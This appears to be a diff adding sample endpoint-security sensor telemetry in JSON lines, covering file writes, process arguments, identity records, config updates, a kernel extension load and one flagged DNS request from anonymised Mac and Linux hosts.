+{"event_simpleName":"GzipFileWritten","ContextTimeStamp":"1625677504.542","ConfigStateHash":"3090255842","ContextProcessId":"362897421906895953","ContextThreadId":"0","aip":"67.43.156.14","FileIdentifier":"04000001000000000000000000000000501f510700000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GzipFileWrittenMacV1","id":"ffffffff-1111-11eb-9320-06d410e6f705","EffectiveTransmissionClass":"2","aid":"fffffffffc2c4e4fa9c08e1a8388e5f9","timestamp":"1625677504614","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz"}
+{"event_simpleName":"IOServiceRegister","ContextTimeStamp":"1625622770.595","ConfigStateHash":"3967242894","aip":"67.43.156.13","IOServiceClass":"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject","ConfigBuild":"1007.4.0013701.1","IOServicePath":"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000","event_platform":"Mac","IOServiceProperties":"","Entitlements":"15","name":"IOServiceRegisterMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","IOServiceName":"Touch Bar Backlight","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"PtyCreated","ContextTimeStamp":"1625622602.031","ConfigStateHash":"3967242894","ContextProcessId":"364938416497226937","DeviceId":"251658248","ContextThreadId":"0","aip":"67.43.156.13","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PtyCreatedMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677478739","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"LocalAddressIP4":"67.43.156.14","event_simpleName":"LocalIpAddressRemovedIP4","ConfigStateHash":"1803419442","aip":"67.43.156.14","InterfaceIndex":"18","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressRemovedIP4MacV1","id":"ffffffff-1111-11eb-b7b7-066cc89bcebf","EffectiveTransmissionClass":"2","aid":"ffffffff5ae3449ab33a1809fe6c5ce2","timestamp":"1625677475967","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"NetworkCloseIP6","ContextTimeStamp":"1625677474.875","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"12241681491990","RemotePort":"9","aip":"67.43.156.13","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59999","Entitlements":"15","name":"NetworkCloseIP6LinV6","id":"ffffffff-1111-11eb-8130-02cde7751097","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff335f47ca89cad6a19f203bbd","ConnectionDirection":"2","InContext":"0","timestamp":"1625677475413","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"ConfigBuild":"1007.8.0011611.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1156120155","ConfigStateData":"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV2","aip":"67.43.156.14","id":"ffffffff-1111-11eb-af89-06c111484f9f","aid":"ffffffffa74a4c89b9984a3a7124bb9d","timestamp":"1625677490580","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"SuspiciousDnsRequest","ContextTimeStamp":"1625677493.531","ConfigStateHash":"3090255842","ContextProcessId":"364839648316192383","DomainName":"hg-t2.dotice.me","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"SuspiciousDnsRequestMacV1","id":"ffffffff-1111-11eb-a4a3-02cbdfb8f529","EffectiveTransmissionClass":"2","aid":"ffffffff0cd64fb78626ab1b6c65ac8c","timestamp":"1625677493756","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"1"}
+{"Parameter2":"0","event_simpleName":"ErrorEvent","Parameter1":"18446744072635810412","Parameter3":"0","ConfigStateHash":"1156120155","aip":"67.43.156.14","Line":"96","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ErrorStatus":"3759276032","name":"ErrorEventLinV1","id":"ffffffff-1111-11eb-bdd3-0681aa29cecb","Facility":"16778240","aid":"ffffffffabd047b1a86c1fcd8ef22b59","File":"0","timestamp":"1625677530922","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"ConfigStateUpdate","ConfigStateHash":"3090255842","ConfigStateData":"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c04
0000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,1c0400000299,1c040000029b,1c040000029c,1c040000029d,1c040000029f,1c04000002a0|3,0,65|","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ConfigStateUpdateMacV2","id":"ffffffff-1111-11eb-8dc4-0234c12f9875","EffectiveTransmissionClass":"0","aid":"ffffffffa15a452190ae454f7d33e07e","timestamp":"1625677530590","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"KextLoad","ContextTimeStamp":"1625677509.064","ConfigStateHash":"1620585913","ContextProcessId":"364867547408058681","ContextThreadId":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","BundleID":"com.apple.driver.AudioAUUC","Entitlements":"15","name":"KextLoadMacV1","id":"ffffffff-1111-11eb-a2ae-028f6bf89be7","EffectiveTransmissionClass":"2","aid":"ffffffffaa0e47a1b009aef151d6179d","timestamp":"1625677509069","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"ChannelVersion":"25","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"3155796140","aip":"67.43.156.14","ChannelVersionRequired":"0","ChannelId":"20","ConfigBuild":"1007.8.0011110.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV1","id":"ffffffff-1111-11eb-b411-06baeacb7a63","aid":"ffffffff67d54f7daf3d998ffc74d48e","timestamp":"1625677507901","cid":"ffffffff15754bcfb5f9152ec7ac90ac"}
+{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"2037712541","Timeout":"60","ParentProcessId":"0","aip":"67.43.156.14","SuppressType":"3","SHA256HashData":"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20","ProcessCount":"60","BoundedCount":"57","ConfigBuild":"1007.8.0011308.1","UID":"115","event_platform":"Lin","CommandLine":"sh -c \"/usr/lib/erlang/erts-11.1.3/bin/epmd\" 
-daemon","Entitlements":"15","name":"ProcessRollup2StatsLinV3","id":"ffffffff-1111-11eb-b34e-063f4cefccb3","EffectiveTransmissionClass":"2","aid":"ffffffffe22549479fbe8293b6747a68","timestamp":"1625677511754","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"UserIdentity","LoginSessionId":"1138166333440","AuthenticationUuidAsString":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","UserName":"user1","ConfigStateHash":"3967242894","aip":"67.43.156.13","AuthenticationId":"265","UserPrincipal":"user1@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1530","ConfigBuild":"1007.4.0013701.1","UID":"265","event_platform":"Mac","Entitlements":"15","name":"UserIdentityMacV4","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","timestamp":"1625677478122","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"FeatureVector":"000000527b2276223a22312e30222c226e223a352c226c223a3235362c2265223a7b2261223a5b31363737373232332c31363737373232332c31363737373232332c31363737373232332c31363737373232335d7d7d3f48793e3f6837b53f276c8b3ef8d4fe3f036e2f3fdb404f3e361134404d8c7e3df27bb33ef837b53faa57a83e752546402e6b513eb8e2193f5e63203e1446743f295e9e401fb7e93fe010623f90be0e3f6f837b3e7333333f3951833f33afb83e3f62b73e1893753f1b851f3ea752543e9333333ed446743f045a1d40889ba64065d2f2ad9a1b883f573eab3dd773193ed254613f3f3b643eedab9f3f579a6b4082b5dd3f92d42c3e8809d54040fcf83f90a71e40d717593e832ca53e19e83e3b4b295f3f64c2f83f8a9d1f3f27fcb93f088ce73e7333333de944673e81d7dc3f2db22d3e90cb293e2ca57a3e22b6ae3e843fe63f44fdf43f0573eb3ecbc6a83c648e8a3ceb1c433d16c6153c0d4fdf3d0529353e08ce703c2d81ae3f0809d53b69a2c63b7b43d93ded91683ba90cd43e2f9db23b6e28673d646499bb84406c3c0bd6623ea809d53edfb15b3dcc73acbc188d2a3c20cae63d390eaa3d148fda398cfb263b872b023d4d2b2c3a19c60fbc58ec963af9b13139f75bed3f687fcc3f105bc0ae9de3cf3cfb15b53a5dcccfbc2398203c9f40a3ba91e2153d0ec95c3f7e00d23dd048173c13b7d83f3404ea3ef06f6940
0392643c4dc8753b1f9485bb875d573cdebd903e1a9fbe3be83a113b1528f23c9279143c40053e3b62089e3d06ec183d16e58aba9c7ffe3b30c0273c3cbe623cc9eecc3b1e55c1ba25558f35192b55bcba493d357b1f123422c77e35700fd4349540073385f5c53562b199363180c1bbb5f5f133702cb134553ec134453f1234dfedcabba8e2e3bc4df26734da8f6636e51c133592f7ea34116278be173eabbc11ea79bbb3d4ae3574e4c733a4bbc53046530d34fd74ee330432f8bcf212d7bbaf3e47bc46690534a8a19335420670af1ab38734cdff54338e0e59bd23ad1934a8bd10bd2bb44e3433be90390220d73590265c3481ec3abb7701543b3e1eb437841ede333ede4c31d582ecbc195ee13510b6ab35ab6563b85ae696bcc582563510d9083490265c319cda2abc8327673428415ebba593a3347763df2f713b9cbd14a4d33486ea69bca3ec033d58ec963dc523f63dba7daa3cab9f563d5c67e03e8425af3cdaf8df3f47381d3bab606b3d174e663e6b1c433c4710cb3f04d0143c9691a73e0a233a3bde2ac33d0240b83ee339c13f139c0f3e2fec573df34d6a3d00e6b03df1a9fc3d9fb3fa3b6629953c4100e73d89fe873c0811b23d2d2dcb3ce5de163d0a1dfc3fac816f3f5096bc2e0d65af3df559b43b38ae323cf6555c3d93c3613d78a0903de872b03eb439583e27ef9e3c1689443f7c8b443eb06f694010ce703cff822c3c2d81ae3b0e68e43db5e2043e6b367a3d355ef23d1b089a3c5898b33bd373b03c41d29e3decbfb13d8a0e413bd9dfdb3c2dab9f3d1fddec3dcdd2f23cd10f523ce9ccb83f4b2fec3f7119ce3f276c8b3ee831273f036e2f3fe58adb3e361134404d8c7e3df972473ef837b53faab3683e7f1412402f34d73eb8e2193f62339c3e1446743f2041894013e0df3fe010623f90be0e3f6f837b3e7333333f449ba63f30a3d73e3f62b73e1893753f1b851f3ee240b83e9333333ed446743f03d07d40889ba64065d2f2ad8f49d23f4fd8ae3dd14e3c3edde69b3f3e147b3ee5bc023f579a6b409780343f92d42c3e8809d540435f703f90a71e40d717593e832ca53e19b3d03cc13fd13f6374bc3f8a9d1f3f27fcb93f1cd35b3e7333333de388663e884b5e3f29999a3e90cb293e2305533e2147ae3e843fe63f4d013b3f056d5d3ebe28243c6703b03cf084623d14a4d33c093b7e3d05a7093e087fcc3c304ab63f08c7e33b6ad0c43b8893b83dec22683ba8e2e33e2c56d63b6cd8dc3d637de9bb849cb23c08e79b3ea6dc5d3ee00d1b3dcb923abc1fd36f3c1cf56f3d385c683d134acb398c098e3b872b023d4e075f3a108bd4bc564d7f3b029cfe399cd0863f6958103f10b780ae9e16793cf601793a58523cbc231e7e3c9eecc0ba8398a63d
0fba883f7d63883dd254613c14c4483f349ba63ef0b0f24003aa263c49afe23b23d70abb875d573cde3fbc3e1a9fbe3bebcc6c3b19d0203c92641b3c402f303b62d1f23d0366513d1797ccba9f40a33b32c83f3c39a1773ccfe9b83b2276b8ba786f1235192b55bcb890d63573a8ab34a531f734c11ccb3495400732a151a8369df96936179953bbbc1f00340207b734553ec134b523e7352bd356bba8e2e3bc4df26733a7cdeb36e51c1335421b0e3515c299be173eabbc11e647bbb3d4ae328448f533aa5c213046530d357f25dd330432f8bcf290acbbae9ee4bc4669053496f7d534ede333af1ab38733a03ec7346522f2bd23ad19353fd9cfbd2bb44e3392336039250bbe34bb34f73618f0ecbb7701543c50e560356884d0330f9fab31d582ecbc19f5e03510b6ab34e35d66b85ac660bcc582563510d9083490265c3399a707bc84a0e43474d02abba593a3342f209630b98ae7bd11fb4033605e7dbc9e59f33d5f11733dc922533db943183ca5a46a3d5b42463e83bcd33cdd2f1b3f47fcb93bae3a3b3d1ceaf23e6978d53c4836653f03a29c3c9afe1e3e096bba3bde76423cfd4bf13ee1e4f73f1418933e2ee6323df1a9fc3cfe1da83df0d8453d9e7ea63b69f6a93c4083123d8a7c5b3c0266773d2e147b3ce978d53d08ce703facf41f3f510cb32e0d9dfa3df2b0213b2bd5dc3cf77af63d94ee393d782d383de978d53eb404ea3e288ce73c2209ab3f7c91d13eb0d8454010e2193cfc65413c2e53653b0ede553db674d13e6ae7d53d361bb03d1c23b83c579d0a3bd3176a3c4447c33dea161e3d8a67623bd477bc3c2f4f0e3d1e6eeb3dd07c853cd4e8fb3cded2893f42de013f6d4fdf3f276c8b3ee1e4f73f036e2f3fe58adb3e361134404d8c7e3df837b53ef18fc53faa57a83e781d7e402d53263eb8e2193f62339c3e1b089a3f204189400eb9f53fe010623f9395813f6a233a3e81ff2e3f41a9fc3f3013a93e2666663e17dbf53f1b851f3ec666663e9333333ed446743f0e560440889ba64065d2f2ad9a1b883f573eab3dd7a7873edde69b3f3f3b643eed42c43f6a30554087f62b3f92d42c3e83958140435f703f90a71e40d717593e832ca53e19ce073cd0917d3f6374bc3f8a9d1f3f26e9793f088ce73e7333333df34d6a3e8710cb3f34f7663ea20c4a3e1a02753e23bcd33e843fe63f3a36e33f0573eb3ec84b5e3c6685db3cef0ae53d17acc53c0b32cf3d05681f3e0831273c2ff6d33f0a29c73b6a9e6f3b88c60d3deecbfb3baa53fc3e2d91683b6c636b3d66d9bebb8533b13c0a0d353ea91d153ee275253dcc9d9dbc159e623c1d27c43d3ad18d3d145b6c3982b47b3b88051d3d4fe9b83a12e7cfbc579d0a3af0a5f0390a9f2b3f69db233f10b780ae
9e5a073cfc26573a5a6b1bbc247ed03c9d7343ba9bb6aa3d0f66a53f7d49523dd35a863c151c5c3f35b5743ef1d14e40047f243c4d9e843b24095fbb87b99d3cdd82fd3e1c28f63beeae9f3b14812c3c91a75d3c40ad043b613f4b3d033c603d195033ba9d8c6d3b307d0b3c3d12453cd234ec3b25375dba904f6e35181195bcba493d35a2674934a531f7352bda363522229033be54dc337b157336151dabbbb5f5f1340207b7345d30d93421b49d34c2b91cbba8e2e3bc4df26733a7cdeb369116e13592f7ea34116278be173eabbc11e647bbb3d4ae328448f533b7f4153046530d359e3e2233d006d8bcf2cf96bbad9ad8bc466905351da01436249e38af17834033a03ec7346522f2bd1ddc1e35d36497bd2bb44e33bf0a47390220d734c2822235531fdebb73ba773c1888f8356884d0330f9fab31d533c2bc195ee135adf23935ab6563b85b06ccbcc84b5e3510d9083490265c33e590e6bc81450f33ce498bbba593a334d1f8602f713b9cbd1930be33605e7dbca3ec033d5d249e3dc85b183dbc115e3ca858793d5c33723e83afb83cdcc63f3f4916873bab47413d1cb6853e6b9f563c49320e3f03eab33c9afe1e3e0aa64c3bdfd6953cfac1d33ee3e4263f14af4f3e2f69443df3b6463cfeda663df2b0213d9faebc3b50678c3c4250723d8c00543c0151a43d2d0e563ce4f7663d0701113fad2bd43f5075f72e0e19d33df5f6fd3b2eb80f3cf487fd3d92e72e3d7842313de944673eb50b0f3e295e9e3c1fd36f3f7d6a163eb15b57401159b43d000a7c3c2d2dcb3b0ecd8e3db4e11e3e6c3c9f3d3adc0a3d1bb0603c52dcb13bd338f83c4100e73de9e1b13d8b53503bd6ece13c2cd9e83d201cd63dd1b7173cda12303cdc725c3f48793e3f6ded293f276c8b3f036e2f3f036e2f3fea0f913e361134404d8c7e3e0189373ef837b53fabc3613e7f62b7403012063eb79a6b3f5e63203e0d4fdf3f204189400de9e23fe010623f90be0e3f6a233a3e81ff2e3f3951833f30902e3e4275253e18793e3f1b851f3ee0f9093e9333333ed446743f045a1d40889ba64065d2f2ad9d19253f573eab3dc692f73ece21963f3f3b643eee2eb23f579a6b407e76c93f92d42c3e83958140435f703f90a71e40d717593e832ca53e25aee63cb7e9103f64c2f83f8a9d1f3f27fcb93f06a7f03e676c8b3de147ae3e884b5e3f27bb303e90cb293e3295ea3e21e4f73e81205c3f3fec573f0573eb3ebec56d3c633eff3cf1800a3d1389b53c0ac1903d0587943e06dc5d3c2efb2b3f095e9e3b67ddca3b80303c3dec8b443ba782903e30068e3b6bcc6c3d619b91bb836eb53c0bf7f03ea60aa63ee00d1b3dcc447cbc28c1553c1d55e73d36e2eb3d132b56399063903b8776813d4d7f0f3a
15a1bdbc55cfab3b06f04a39c25a833f68f5c33f107c85ae9e10d83cf9335d3a594a8abc2276b83c9f16b1ba66e57d3d0e0c9e3f7dbf483dd1b7173c1435ad3f34bc6a3ef096bc4003689d3c49afe23b22fcf0bb87a8d63cde939f3e1aee633bedbb5a3b14f69d3c91e6473c402f303b64217d3d06cca33d183516ba9fe8683b33d4ae3c38f9b13cced9173b288f00ba5a42d7356eda97bcb9628d356e0c6f341b95cf341f3c6534ad5b0a32a151a8337b157335b2c72cbbb2852334900adf34553ec1346e5ee5347ab7febba8e2e3bc4df26733a7cdeb35cf19143592f7ea34c9a612be173eabbc11e647bbb3d4ae35219fff33b7f4153046530d348b7aa434677fadbcf290acbbaf2d80bc46690535a6b2cc3206f2a8af17834033a03ec7338e0e59bd1e83e435857ac3bd2bb44e33043df73927249d34bb34f735906b14bb780dc33c50e560361e0a98336f92c2320a0eb4bc19b2c435adf23935ab6563b85a4586bcc56d5d3510d9083490265c3399a707bc811b1e34cde3d7bba593a334aec0612fb676c6bd13be2333605e7dbca3ec033d59be4d3dc9667b3db83cf33ca7ef9e3d5c09813e8361133cdba0a53f485f073ba023213d191bc53e69fbe73c4059213f04dd2f3c9835163e0865953be38a7e3d0385c63ee1b08a3f142c3d3e2f9db23df0068e3cff6d333df06f693d9e7ea63b68fb013c4250723d8a4d2b3c0b007a3d2e924f3cea209b3d094c443faccccd3f50ded32e0d9dfa3df41f213b2dab9f3cf95d4f3d94a4d33d7991bc3de809d53eb532613e28db8c3c1afe1e3f7cd9e83eb0ff974010f0d83cfc3b4f3c2e53653b0ede553db6c3763e6bb98c3d35f1bf3d1a95423c53d85a3bcedd483c46bce83ded5cfb3d8ac0833bd0edc43c319a413d1e30013dd07c853cdcf0303ce243573f4ded293f69c77a3f13d70a3f036e2f3f036e2f3feaa3053e361134404d8c7e3df5c28f3ef02de03faa57a83e70d845402f5dcc3eb8e2193f62339c3df0068e3f204189400de9e23fe010623f90be0e3f6a233a3e7333333f4a85883f3318fc3e4000003e063f143f1b851f3ecb5dcc3e9333333ed446743f0e560440889ba64065d2f2ad8f49d23f573eab3dbeff193ed7f62b3f3f3b643eedab9f3f57d567409780343f9292a33e8395814041158c3f90a71e40d717593e832ca53e1a511a3c74c6e73f64c2f83f832cf93f26e9793f03a92a3e6872b03df34d6a3e884b5e3f3381d83ea20c4a3e1a02753e2353f83e825aee3f4d013b3f041f213ec240b83c6a4a8c3cf3a14d3d15b5743c091e213d059c8d3e08ce703c2f78ff3f0837b53b6a7ce13b815e393ded91683ba9cdc43e2d42c43b73dc053d6147aebb8438093c0a61173ea72b023edf559b3dcaff6dbc1bd4063c
21fd153d39ffd63d128e0d398d4bad3b894c443d4f18013a195aafbc5773193af57f7339ce41413f6851ec3f0fec57ae9dfa533cfa58f73a5a0d27bc21943a3ca1dfb9ba5471063d0e56043f7dd2f23dd1b7173c14b3813f33dd983ef013a9400347d83c4ca2db3b245d42bb8733663ce243573e1b22d13bf47b673b0f32383c928e0d3c4059213b6304473d05143c3d176ddbba9aed573b3220793c3c6a7f3ccc4ef93b267621ba298e0334f8d6f4bcba493d35461af9342ca85e34c11ccb352222903385f5c5368e9b3935b2c72cbbb75ea6344cfa3134553ec134b523e734c2b91cbba8e2e3bc4df26734d636243705eeb9351ad56535332082be173eabbc11ea79bbb3d4ae35a82cc133a943c13046530d34fd74ee34677fadbcf27bb3bbad8a11bc4669053496f7d53580f4d6af1848493405e546338e0e59bd23ad193400bddcbd2bb44e33bf0a473927249d34c2822235531fdebb73ba773c626d4836cf4407330f9fab31d582ecbc1a027535b8af0035d13ed5b85ad11cbcc582563573cb0735d499d3319cda2abc8548aa3474d02abba593a3351ccb0c2f713b9cbd14a4d333605e7dbca3ec033d6108c43dc9e4503dba34443ca454de3d5a511a3e84816f3cdc09813f4773193bac3a863d1945b73e6b1c433c48de2b3f03e4263c9a415f3e08b4393bd8ba413d0073583ee1cac13f13a92a3e2e48e93df318fc3d0216c63df212d73d9d7dbf3b627e0f3c44ef893d8ba1f53c03e8573d2c9afe3ce5f30e3d0846203fac710d3f50c49c2e0d4f2a3df487fd3b306c443cf837b53d96ffc13d795d4f3de8db8c3eb4bc6a3e28a71e3c1fba453f7c56d63eb07c854010c63f3cfeb0753c3170503b0e68e43db977853e6bb98c3d3c7f783d19a4163c55f99c3bd1e96c3c4669053debb98c3d8a6ca03bde43ee3c2efb2b3d2007dd3dce075f3cdbb59e3ce75793b01aa501","event_simpleName":"DeliverLocalFXToCloud","ConfigStateHash":"1620585913","aip":"67.43.156.14","ModelPrediction":"1436899696705536","SHA256HashData":"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2","Malicious":"0","ConfigBuild":"1007.4.0013701.1","FeatureExtractionVersion":"2","event_platform":"Mac","FXFileSize":"502032","Entitlements":"15","name":"DeliverLocalFXToCloudMacV4","PupAdwareDecisionValue":"12384657383358464","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","PupAdwareConfidence":"0","EffectiveTransmissionClass":"1","aid":"ffffffff45d647e6ae0ba8764a4bd570","MLModelVersion":"4","timestamp":"1625
677489052","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"CreateProcessArgs","ContextTimeStamp":"1625677524.929","ConfigStateHash":"3090255842","ContextProcessId":"365035560818271291","ContextThreadId":"365035560818271291","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","CommandLine":"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path 
/Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore -index-system-modules","Entitlements":"15","name":"CreateProcessArgsMac","id":"ffffffff-1111-11eb-8332-020506b18db5","EffectiveTransmissionClass":"2","aid":"ffffffffb3a3442585c05abc61e290fc","timestamp":"1625677525128","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend"} +{"event_simpleName":"PdfFileWritten","ContextTimeStamp":"1625677488.523","ConfigStateHash":"3090255842","ContextProcessId":"364156540965623394","ContextThreadId":"0","aip":"67.43.156.13","FileIdentifier":"05000001000000000000000000000000f1321d0000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PdfFileWrittenMacV1","id":"ffffffff-1111-11eb-8903-022a1941b91f","EffectiveTransmissionClass":"2","aid":"ffffffffc4044541995bffd84b9df003","timestamp":"1625677488576","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95"} +{"event_simpleName":"GroupIdentity","GID":"242","AuthenticationUuidAsString":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","ConfigStateHash":"3967242894","aip":"67.43.156.13","AuthenticationId":"1119489580471877843","UserPrincipal":"user2@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1485","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GroupIdentityMacV2","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","timestamp":"1625677478379","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"MachOFileWritten","ContextTimeStamp":"1625622611.845","ConfigStateHash":"3967242894","MachOSubType":"3","ContextProcessId":"364938429384226082","Size":"0","ContextThreadId":"0","aip":"67.43.156.13","SHA256HashData":"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198","FileIdentifier":"04000001000000000000000000000000ac41270400000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"MachOFileWrittenMacV3","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677479336","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl"} 